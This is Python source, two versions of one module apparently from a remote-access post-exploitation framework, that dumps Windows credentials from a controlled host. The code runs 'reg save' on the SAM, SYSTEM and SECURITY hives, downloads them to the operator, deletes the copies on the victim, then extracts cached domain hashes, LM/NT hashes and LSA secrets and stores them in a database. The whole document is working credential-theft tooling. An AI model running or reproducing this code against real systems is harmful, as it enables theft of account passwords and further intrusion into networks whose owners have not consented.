def run(self, args): # First, we download the hives... rep=os.path.join("data","downloads",self.client.short_name(),"hives") try: os.makedirs(rep) except Exception: pass self.info("saving SYSTEM hives in %TEMP%...") for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"): self.info("running %s..." % cmd) self.log(shell_exec(self.client, cmd)) self.success("hives saved!") remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%") self.info("downloading SYSTEM hive...") download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM")) self.info("downloading SECURITY hive...") download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY")) self.info("downloading SAM hive...") download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM")) self.success("hives downloaded to %s" % rep) # Cleanup self.info("cleaning up saves...") try: self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM")) self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY")) self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM")) self.success("saves deleted") except Exception as e: self.warning("error deleting temporary files: %s"%str(e)) # Time to run creddump! # HiveFileAddressSpace - Volatilty sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM")) secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY")) samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM")) #detect windows version is_vista=False try: if self.client.conn.modules['sys'].getwindowsversion()[0] >=6: is_vista=True self.info("windows > vista detected") else: self.info("windows < vista detected") except: self.warning("windows version couldn't be determined. supposing vista=False") # Print the results self.info("dumping cached domain passwords...") for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista): self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'), d.lower(), dn.lower())) self.info("dumping LM and NT hashes...") bootkey = get_bootkey(sysaddr) hbootkey = get_hbootkey(samaddr,bootkey) for user in get_user_keys(samaddr): lmhash, nthash = get_user_hashes(user,hbootkey) if not lmhash: lmhash = empty_lm if not nthash: nthash = empty_nt self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex'))) self.info("dumping lsa secrets...") secrets = get_file_secrets(os.path.join(rep, "SYSTEM"), os.path.join(rep, "SECURITY"), is_vista) if not secrets: self.error("unable to read LSA secrets, perhaps the hives are corrupted") return for key in secrets: self.log(key) self.log(self.dump(secrets[key], length=16)) # The End! (hurrah) self.success("dump was successfull!")
def windows(self): # First, we download the hives... #detect windows version is_vista = False try: if self.client.conn.modules['sys'].getwindowsversion()[0] >= 6: is_vista = True self.info("windows > vista detected") else: self.info("windows < vista detected") except: self.warning( "windows version couldn't be determined. supposing vista=False" ) self.success("saving SYSTEM hives in %TEMP%...") cmds = ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM", "reg save HKLM\\SECURITY %TEMP%/SECURITY", "reg save HKLM\\SAM %TEMP%/SAM") if is_vista: cmds = (x + ' /y' for x in cmds) for cmd in cmds: self.info("running %s..." % cmd) self.log(shell_exec(self.client, cmd)) self.success("hives saved!") remote_temp = self.client.conn.modules['os.path'].expandvars("%TEMP%") self.info("downloading SYSTEM hive...") download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(self.rep, "SYSTEM")) self.info("downloading SECURITY hive...") download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(self.rep, "SECURITY")) self.info("downloading SAM hive...") download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(self.rep, "SAM")) self.success("hives downloaded to %s" % self.rep) # Cleanup self.success("cleaning up saves...") try: self.client.conn.modules.os.remove( ntpath.join(remote_temp, "SYSTEM")) self.client.conn.modules.os.remove( ntpath.join(remote_temp, "SECURITY")) self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM")) self.success("saves deleted") except Exception as e: self.warning("error deleting temporary files: %s" % str(e)) # Time to run creddump! hashes = [] # HiveFileAddressSpace - Volatilty sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM")) secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY")) samaddr = HiveFileAddressSpace(os.path.join(self.rep, "SAM")) # Print the results self.success("dumping cached domain passwords...") for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista): self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'), d.lower(), dn.lower())) hashes.append({ 'Login': u.lower(), 'Hash': "%s:%s:%s" % (h.encode('hex'), d.lower(), dn.lower()), 'Category': 'MSCACHE hash', 'CredType': 'hash' }) self.success("dumping LM and NT hashes...") bootkey = get_bootkey(sysaddr) hbootkey = get_hbootkey(samaddr, bootkey) for user in get_user_keys(samaddr): lmhash, nthash = get_user_hashes(user, hbootkey) if not lmhash: lmhash = empty_lm if not nthash: nthash = empty_nt self.log("%s:%d:%s:%s:::" % (get_user_name(user), int( user.Name, 16), lmhash.encode('hex'), nthash.encode('hex'))) hashes.append({ 'Login': get_user_name(user), 'Hash': "%s:%s" % (lmhash.encode('hex'), nthash.encode('hex')), 'Category': 'NTLM hash', 'CredType': 'hash' }) self.db.add(hashes) self.success("Hashes stored on the database") self.success("dumping lsa secrets...") secrets = get_file_secrets(os.path.join(self.rep, "SYSTEM"), os.path.join(self.rep, "SECURITY"), is_vista) if not secrets: self.error( "unable to read LSA secrets, perhaps the hives are corrupted") return for key in secrets: self.log(key) self.log(self.dump(secrets[key], length=16)) # The End! (hurrah) self.success("dump was successfull!")